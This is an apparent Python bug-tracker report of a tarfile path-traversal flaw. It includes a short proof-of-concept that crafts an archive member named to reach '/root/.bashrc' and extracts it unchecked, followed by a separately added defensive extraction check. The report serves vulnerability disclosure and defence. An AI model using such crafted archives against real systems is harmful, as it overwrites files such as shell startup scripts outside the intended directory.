[New-bugs-announce] [issue45170] tarfile missing cross-directory checking

daji ma report at bugs.python.org
Sat Sep 11 03:45:41 EDT 2021

New submission from daji ma <xiongpanju at gmail.com>:

tarfile is missing cross-directory checking (like ../ or ..\); this can potentially cause cross-directory decompression.
The exp:
# -*- coding: utf-8 -*-
import tarfile

def extract_tar(file_path, dest_path):
    # Extracts every member as-is; tarfile does not reject names containing ../
    try:
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False

def make_tar():
    # Builds the archive whose member name points outside the extraction directory
    with tarfile.open('x.tar.gz', 'w:gz') as tar_file:
        tar_file.add('bashrc', '/../../../../root/.bashrc')

if __name__ == '__main__':
    extract_tar('x.tar.gz', 'xx')

components: Library (Lib)
messages: 401631
nosy: xiongpanju
priority: normal
severity: normal
status: open
title: tarfile missing cross-directory checking
type: security
versions: Python 3.8

Python tracker <report at bugs.python.org>
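A defensive counterpart to the extraction routine in the report, added here as an example and not part of the report or of CPython's own tarfile: every member's destination (and, for links, the link target) is resolved against the destination directory before anything is written, and the whole archive is refused if any member escapes. The `build_tar`/`scan` helpers and the constructed archives are assumptions for demonstration.

```python
import io
import os
import tarfile

def is_within_directory(directory, target):
    """True when `target` (after normalising ../ segments) stays under `directory`."""
    abs_dir = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return os.path.commonpath([abs_dir, abs_target]) == abs_dir

def unsafe_members(tar, dest):
    """Names of members that would be written, or would link, outside `dest`."""
    bad = []
    for member in tar.getmembers():
        member_path = os.path.join(dest, member.name)  # an absolute name discards dest
        if not is_within_directory(dest, member_path):
            bad.append(member.name)
        elif member.issym():  # symlink targets resolve relative to the link's directory
            target = os.path.join(os.path.dirname(member_path), member.linkname)
            if not is_within_directory(dest, target):
                bad.append(member.name)
        elif member.islnk():  # hard link targets resolve relative to the archive root
            if not is_within_directory(dest, os.path.join(dest, member.linkname)):
                bad.append(member.name)
    return bad

def safe_extract(tar, dest):
    """Reject the whole archive if any member escapes; otherwise extract it."""
    bad = unsafe_members(tar, dest)
    if bad:
        raise tarfile.TarError("members escape %r: %s" % (dest, bad))
    tar.extractall(dest)

def build_tar(entries):
    """Constructed sample archive: (name, data) for files, (name, None, target) for symlinks."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data, *link in entries:
            info = tarfile.TarInfo(name)
            if link:
                info.type, info.linkname = tarfile.SYMTYPE, link[0]
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def scan(tar_bytes, dest):
    # Open constructed archive bytes and report which members would escape `dest`
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return unsafe_members(tar, dest)
```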
